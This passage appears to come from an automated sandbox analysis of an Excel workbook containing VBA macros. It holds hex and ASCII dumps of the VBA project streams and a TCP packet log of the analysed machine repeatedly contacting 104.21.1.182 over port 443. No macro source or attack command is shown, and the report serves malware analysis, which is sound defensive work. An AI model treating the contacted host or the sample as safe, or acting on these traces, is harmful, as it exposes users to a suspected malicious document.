                                                                                          Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 02 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                          Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2324
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_0
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:2324
                                                                                          Entropy:3.680089757467968
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ F . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . ( 5 J . o J 4 . 4 . . . . . . . . . . . . .
                                                                                          Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 1f 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
                                                                                          Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 238
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_1
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:238
                                                                                          Entropy:1.6407554654577468
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . Z . . . . . . . . . . . . . . .
                                                                                          Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 76 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00
                                                                                          Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 1154
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_2
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:1154
                                                                                          Entropy:2.552347549542373
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . 1 . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . / . ` . . . a . . . . . . . .
                                                                                          Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 08 00 00 00 a1 06 00 00 00 00 00 00 00 00 00 00 e1 0f 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00
                                                                                          Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_3
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:156
                                                                                          Entropy:1.7820663630707385
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 80 08 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                          Stream Path: VBA/__SRP_4, File Type: data, Stream Size: 432
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_4
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:432
                                                                                          Entropy:1.6340463425878387
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . .
                                                                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 21 07 00 00 00 00 00 00 00 00 00 00 51 07 00 00 00 00 00 00 00 00 00 00 81 07
                                                                                          Stream Path: VBA/__SRP_5, File Type: data, Stream Size: 106
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_5
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:106
                                                                                          Entropy:1.3591119461716878
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                          Stream Path: VBA/dir, File Type: data, Stream Size: 229
                                                                                          General
                                                                                          Stream Path:VBA/dir
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:229
                                                                                          Entropy:5.697804813447464
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . Q . T . . . J < . . . . . D . . . . . . . T . h i s W o r k b @ o o k G . . . ) T . . h . i . s . W . . o . r . k . b U . . o . . . . / 2 . / . . . u H . . 1 . ` . . . . . . . , C " . J ( . + . . . q S @ h e e t 1 G : S . I e . e . t . 1 . . . 2 . : . . : . =
                                                                                          Data Raw:01 e1 b0 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 4a 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 00 29 54 00 00 68 00 69 00

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 25, 2024 15:07:13.642860889 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:13.642906904 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:13.642954111 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:13.651542902 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:13.651567936 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:14.981131077 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:14.981328964 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:14.987025023 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:14.987051964 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:14.987453938 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.057075977 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.103332043 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.835865021 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.835915089 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.835947037 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.835964918 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.835971117 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.835983038 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.836007118 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.836033106 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.836072922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.836090088 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.849615097 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.849670887 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.849684954 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.858361959 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.858417034 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.858424902 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:15.861051083 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:15.956020117 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.046608925 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.046778917 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.046814919 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.050055981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.050120115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.050128937 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.064040899 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.064083099 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.064133883 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.064150095 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.064194918 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.072438955 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.079607964 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.079648018 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.079678059 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.079696894 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.079742908 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.088454008 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.096050978 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.096113920 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.096123934 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.101840973 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.101922035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.101931095 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.108654976 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.108712912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.108738899 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.112397909 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.114814043 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.121495962 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.121565104 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.121573925 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.125478983 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.127691031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.137099981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.137139082 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.137168884 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.137187958 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.137315989 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.144505024 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.163944006 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.257025003 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.259970903 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.260149956 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.260193110 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.273082972 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.273099899 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.273238897 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.273262024 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.285887957 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.286046028 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.286096096 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.292464972 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.292568922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.292598009 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.299319029 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.305212021 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.305222034 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.305357933 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.313119888 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.316051006 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.316088915 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.316131115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.321814060 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.321892023 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.321901083 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.325716019 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.331701994 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.331785917 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.332585096 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.342210054 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.342297077 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.352102041 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.355035067 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.355117083 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.358006954 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.358088017 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.359185934 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.367265940 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.368566990 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.368659019 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.373922110 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.374073029 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.384288073 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.384371996 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.417316914 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.467356920 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.467540026 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.473014116 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.473103046 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.480946064 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.481028080 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.489810944 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.489936113 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.497917891 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.498014927 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.501879930 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.501956940 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.507467031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.507565975 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.511241913 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.511317968 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.521073103 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.521153927 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.526412964 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.526470900 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.530335903 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.530397892 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.532480955 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.532552004 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.533507109 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.536458015 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.536534071 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.538305044 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.538371086 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.543021917 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.543095112 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.545243025 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.545288086 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.548346996 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.548418045 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.550580978 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.550637007 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.556999922 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.557054043 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.559000015 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.559063911 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.563079119 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.563132048 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.564872980 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.564928055 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.568857908 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.568943977 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.589843035 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.589941025 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.595385075 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.595468998 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.678498030 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.678576946 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.682423115 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.682499886 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.690402031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.690517902 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.691318035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.691328049 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.691340923 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.691395998 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.704185009 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704258919 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.704262018 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704294920 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704323053 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.716020107 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716084003 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716109037 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.716118097 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716144085 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.723721981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723809958 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723828077 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.723839998 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723862886 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.730762005 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.730839968 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.730849981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.730892897 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.935332060 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.935384035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.276104927 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.276129007 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.276223898 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280040979 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280052900 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280065060 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280138969 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280144930 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280162096 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280196905 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280201912 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280216932 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280265093 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.491328001 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.689127922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748414993 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748433113 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748445034 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748483896 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748500109 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748508930 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748518944 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748528004 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748528957 CET49163443192.168.2.22104.21.1.182
